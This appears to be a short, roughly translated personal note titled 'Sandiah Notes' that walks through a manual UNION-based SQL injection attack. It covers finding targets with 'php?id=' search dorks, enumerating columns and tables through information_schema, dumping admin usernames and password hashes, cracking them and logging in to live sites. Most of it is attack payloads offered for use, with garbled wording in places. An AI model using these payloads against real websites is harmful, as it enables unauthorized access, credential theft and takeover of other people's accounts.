Sandiah Notes

I am not a hacker's brother: |
but I want to learn .... hence my post about SQL Injection

- SQL injection (look for the weaknesses of the input ID)
1. give quotes on the back id => to find a web bug
2. use the command http:// ...... order by 1 - (manually) on the back of the site
3. use the command http:// ...... union select 1,2,3,4,5,6,7,8,9,10,11
    after appearing magic number (gap) exp: 4 and 5
    with orders union select 1,2,3, version (), 5,6,7,8,9,10,11
    command to remove a database
    http:// .... union select 1,2,3, database (), 5,6,7,8,9,10,11
    command to remove the data table "
    http:// .... union select 1,2,3, table_name, 5,6,7,8,9,10,11 from information_schema.tables where table_schema = database () -
    displays all the table:
    http:// .... union select 1,2,3, GROUP_CONCAT (table_name), 5,6,7,8,9,10,11 from information_schema.tables where table_schema = database () -
    search all columns:
    http:// .... union select 1,2,3, GROUP_CONCAT (column_name), 5,6,7,8,9,10,11 from information_schema.columns where table_name = database () -
    converting to hex:
    with the site: http://bernadsatriani.net/ascii.htm
    Capture hex code:
    http:// .... union select 1,2,3, GROUP_CONCAT (column_name), 5,6,7,8,9,10,11 from information_schema.columns where table_name = 0xkode ascii (hex) -
    after the last known name column:
    http:// .... union select 1,2,3, GROUP_CONCAT (username, 0x3a, password), 5,6,7,8,9,10,11 from admins -
    to give: => 0x3a
    after can be a password and username
    its on crack passwords using md5 cracker application, or the other.
    after that it can be the password,, try to login live.

in addition to the manual can also use the application:
schemafuzz

looking for admin page
inurl: "php? id ="
site: (website address) inurl: "php? id ="
order by -
- RFI
- LFI
- CSRF